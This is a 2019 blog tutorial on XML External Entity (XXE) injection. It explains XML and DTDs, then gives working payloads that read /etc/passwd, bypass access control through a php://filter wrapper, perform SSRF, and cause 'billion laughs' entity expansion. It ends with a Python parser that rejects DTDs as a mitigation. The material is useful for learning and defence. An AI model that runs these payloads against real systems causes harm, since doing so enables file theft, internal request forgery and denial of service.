Thursday, 17 January 2019

The Basics of XXE - XML External Entity Attack

One of the prime goals in web hacking is to get a backdoor and own the target, and XXE can help you achieve this. But before discussing XXE injection you must know the basics of XML. And yeah, memes are here to eradicate boredom.


Introduction
According to Google, XML is a metalanguage which allows users to define their own customized markup languages, especially in order to display documents on the internet.

Some features of XML are:
  • It simplifies data transport and sharing
  • It simplifies platform change
  • It increases data availability

Well, XML is boring but...



What is DTD? 
DTD stands for Document Type Definition. It defines the structure, the legal elements and the attributes of an XML document.

A DTD is used to verify whether XML data is valid or not. A DTD can be declared either externally or internally.

Internal Declaration of DTD
Inside the XML file, the DTD is wrapped in a <!DOCTYPE> definition. Here is an example from w3schools:


NOTE: In a raw XML file you can view the DTD using the view-source feature.

Let's break down this code snippet.

  • <!DOCTYPE note defines that the root element of this document is note.
  • <!ELEMENT note defines that the element note contains four other elements: "to, from, heading, body".
  • <!ELEMENT to, from, heading, body (#PCDATA)> defines each of these elements to be of type #PCDATA.

External Declaration of DTD
If the DTD is declared in an external file, then the <!DOCTYPE> definition must contain the URI to the DTD file.

Here is another code snippet from w3schools:


And here is the external file which contains the DTD:


#PCDATA is parsed character data



What are DTD Entities?
Entities are used to define shortcuts to special characters.

For declaration types and more information, please consider reading this - https://www.w3schools.com/xml/xml_dtd_entities.asp

Now that's a lot of XML. Let's get back to the main topic: XXE injection.

Who is affected by XXE?
Well, lots of apps use XML, configuration files use XML, many protocols rely on XML, and some use it without even knowing it.

What can we Exploit with XXE?
Well, XXE can be exploited in various ways, including:
  • Local File Inclusion

    <?xml version="1.0"?>
    <!DOCTYPE foo [
    <!ELEMENT foo ANY>
    <!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>

  • Access Control Bypass

    <?xml version="1.0"?>
    <!DOCTYPE foo [
    <!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php">]>
    <foo><result>&ac;</result></foo>

  • SSRF

    <?xml version="1.0"?>
    <!DOCTYPE foo [
    <!ELEMENT foo ANY>
    <!ENTITY xxe SYSTEM "https://www.example.com/text.txt">]><foo>&xxe;</foo>

  • Denial of Service

    <?xml version="1.0"?>
    <!DOCTYPE lolz [
    <!ENTITY lol "lol">
    <!ELEMENT lolz (#PCDATA)>
    <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
    <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
    <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
    <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
    <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
    <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
    <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
    <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
    <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
    ]>
    <lolz>&lol9;</lolz>
    
    
    
    
How to Exploit XXE?
Here is a short 2-minute video demonstrating how to exploit XXE using Burp Suite.
    
    

How to mitigate XXE?
The best and easiest way to mitigate XXE is to disable external entity processing by default, and a lot of parsers actually do this.
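
As an added example (not code from the original post), here is one way to enforce this in Python's standard library. It goes a step further than disabling external entities and refuses any document that carries a DOCTYPE, since that is where entities are declared. The names parse_untrusted, DTDForbidden and is_rejected and the sample documents are made up for illustration.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DTDForbidden(ValueError):
    """Untrusted XML carried a DOCTYPE or an entity declaration."""


def parse_untrusted(data: bytes) -> ET.Element:
    """Parse XML, refusing any DTD so that no entity can be declared or resolved."""
    builder = ET.TreeBuilder()
    parser = expat.ParserCreate()

    def forbid_doctype(name, sysid, pubid, has_internal_subset):
        raise DTDForbidden(f"DOCTYPE {name!r} is not allowed")

    def forbid_entity(name, is_param, value, base, sysid, pubid, notation):
        raise DTDForbidden(f"entity {name!r} is not allowed")

    def forbid_external(context, base, sysid, pubid):
        raise DTDForbidden(f"external entity {sysid!r} is not allowed")

    # Reject the declaration itself; the entity handlers are a second layer.
    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.EntityDeclHandler = forbid_entity
    parser.ExternalEntityRefHandler = forbid_external
    # Ordinary elements and text are still built into a normal tree.
    parser.StartElementHandler = builder.start
    parser.EndElementHandler = builder.end
    parser.CharacterDataHandler = builder.data
    parser.Parse(data, True)
    return builder.close()


def is_rejected(data: bytes) -> bool:
    try:
        parse_untrusted(data)
    except DTDForbidden:
        return True
    return False


# Constructed samples: plain XML, the page's external-entity shape, a tiny nested entity.
BENIGN = b"<note><to>Tove</to><from>Jani</from></note>"
EXTERNAL = (b'<?xml version="1.0"?><!DOCTYPE foo [<!ELEMENT foo ANY>'
            b'<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>')
NESTED = (b'<?xml version="1.0"?><!DOCTYPE lolz [<!ENTITY lol "lol">'
          b'<!ENTITY lol1 "&lol;&lol;">]><lolz>&lol1;</lolz>')
```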

And here we end our tutorial. Thank you so much for reading, guys. Below are the links for further reading; check them for sure.

Resources

    
    
    
    
